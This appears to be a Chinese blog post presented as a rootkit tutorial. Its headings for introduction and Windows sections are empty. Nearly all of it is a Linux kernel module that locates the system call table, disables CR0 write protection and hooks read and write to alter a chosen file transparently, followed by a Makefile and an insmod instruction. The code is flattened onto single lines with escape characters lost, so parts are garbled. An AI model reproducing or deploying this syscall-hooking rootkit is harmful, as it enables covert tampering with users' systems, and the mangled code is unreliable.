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一个典型rootkit包含,android root原理

时间:2023-05-05 01:43:23 阅读:213665 作者:3496

rootkit原理与编写教程 rootkit原理rootkit介绍 windows下rootkit编写windows编程技术 Linux下rootkit编写

rootkit原理 rootkit介绍


windows下rootkit编写 windows编程技术




#include <linux/init.h>#include <linux/module.h>#include <linux/kernel.h>#include <linux/init.h>#include <linux/sched.h>#include <asm/unistd.h>#include <linux/file.h>#include <linux/fs.h>#include <linux/list.h>#include <asm/uaccess.h>unsigned long *sys_call_table = NULL; //系统调用表asmlinkage ssize_t (*sys_read)(int, void *, size_t); //asmlinkage定义函数表示不从寄存器传递参数asmlinkage ssize_t (*sys_write)(int, void *, size_t);static char *filename = "test.c";//S_IRUGO 内核文件权限值 charp指字符指针module_param(filename, charp, S_IRUGO); //module_param定义模块参数用法:name,type,permstatic char *keyword = "key";module_param(keyword, charp, S_IRUGO);int orig_cr0;#define STRLEN 1024char tran_buf[STRLEN];int len = 0;struct _idt //中断描述表{unsigned short offset_low, segment_sel;unsigned char reserved, flags;unsigned short offset_high;};unsigned long *getscTable(){unsigned char idtr[6], *shell, *sort;struct _idt *idt;unsigned long system_call, sct;unsigned short offset_low, offset_high;char *p;int i;/* get the interrupt descriptor table *///__asm__调用内联汇编程序,意为GCC支持的在C/C++代码中嵌入汇编的方式__asm__("sidt %0": "=m"(idtr));/* get the address of system_call */idt = (struct _idt *)(*(unsigned long *)&idtr[2] + 8 * 0x80);offset_low = idt->offset_low;offset_high = idt->offset_high;system_call = (offset_high << 16) | offset_low;shell = (char *)system_call;sort = "xffx14x85";/* get the address of sys_call_table */for (i = 0; i < (100 - 2); i++)if (shell[i] == sort[0] && shell[i + 1] == sort[1] && shell[i + 2] == sort[2])break;p = &shell[i];p += 3;sct = *(unsigned long *)p;return (unsigned long *)(sct);}unsigned int clear_and_return_cr0(void){unsigned int cr0 = 0;unsigned int ret;asm volatile("movl %%cr0, %%eax" : "=a"(cr0));ret = cr0;/*clear the 20th bit of CR0,*/cr0 &= 0xfffeffff;asm volatile("movl %%eax, %%cr0" : : "a"(cr0));return ret;}void setback_cr0(unsigned int val){asm volatile("movl %%eax, %%cr0" : : "a"(val));}void encrypt(char *tran_buf, char *keyword){int keylen = strlen(keyword);printk("keylen %dn", keylen);int tlen = strlen(tran_buf);printk("tlen %dn", tlen);int i = 0;char temp;while (keylen != 0){temp = tran_buf[0];for (i = 1; i < tlen - 1; i++){tran_buf[i - 1] = tran_buf[i];}tran_buf[tlen - 2] = temp;keylen--;}}void decrypt(char *tran_buf, char *keyword){int keylen = strlen(keyword);int tlen = strlen(tran_buf);int i = 0;char temp = 0;while (keylen != 0){temp = tran_buf[tlen - 2];for (i = tlen - 3; i >= 0; i--){tran_buf[i + 1] = tran_buf[i];}tran_buf[0] = temp;keylen--;}}asmlinkage ssize_t filefilter_read(unsigned int fd, char *buf, size_t count){struct file *file;int num = sys_read(fd, buf, count);file = fget(fd);if (file == NULL)return sys_read(fd, buf, count);if (!strcmp(file->f_dentry->d_name.name, filename)){if (count > STRLEN)len = STRLEN - 1;elselen = count;copy_from_user(tran_buf, buf, len);decrypt(tran_buf, keyword);copy_to_user(buf, tran_buf, len);}fput(file);return num;}asmlinkage ssize_t filefilter_write(unsigned int fd, char *buf, size_t count){struct file *file;file = fget(fd);if (file == NULL)return sys_write(fd, buf, count);if (!strcmp(file->f_dentry->d_name.name, filename)){//printk("name %sn",file->f_dentry->d_name.name);if (count > STRLEN)len = STRLEN - 1;elselen = count;copy_from_user(tran_buf, buf, len);encrypt(tran_buf, keyword);copy_to_user(buf, tran_buf, len);}fput(file);return sys_write(fd, buf, count);}static int filefilter_init(void){sys_call_table = getscTable();printk("sys_call_table addr %x!n", sys_call_table);sys_read = (ssize_t(*)(int, void *, size_t))sys_call_table[__NR_read];sys_write = (ssize_t(*)(int, void *, size_t))sys_call_table[__NR_write];orig_cr0 = clear_and_return_cr0();sys_call_table[__NR_read] = (unsigned long)filefilter_read;sys_call_table[__NR_write] = (unsigned long)filefilter_write;setback_cr0(orig_cr0);printk("installed!n");return 0;}static int filefilter_exit(void){orig_cr0 = clear_and_return_cr0();sys_call_table[__NR_read] = (unsigned long)sys_read;sys_call_table[__NR_write] = (unsigned long)sys_write;setback_cr0(orig_cr0);printk("uninstalled!n");return 0;}module_init(filefilter_init);module_exit(filefilter_exit);MODULE_LICENSE("GPL");


.PHONY:cleanifneq ($(KERNELRELEASE),) obj-m += filter.oelse PWD := $(shell pwd) KVER := $(shell uname -r) KDIR := /lib/modules/$(KVER)/builddefault: $(MAKE) -C $(KDIR) M=$(PWD) modulesall:make -C $(KDIR) M=$(PWD) modules clean:rm -rf *.o *.mod.c *.ko *.symvers *.order *.makersendif

make后insmod filter.ko即可完成

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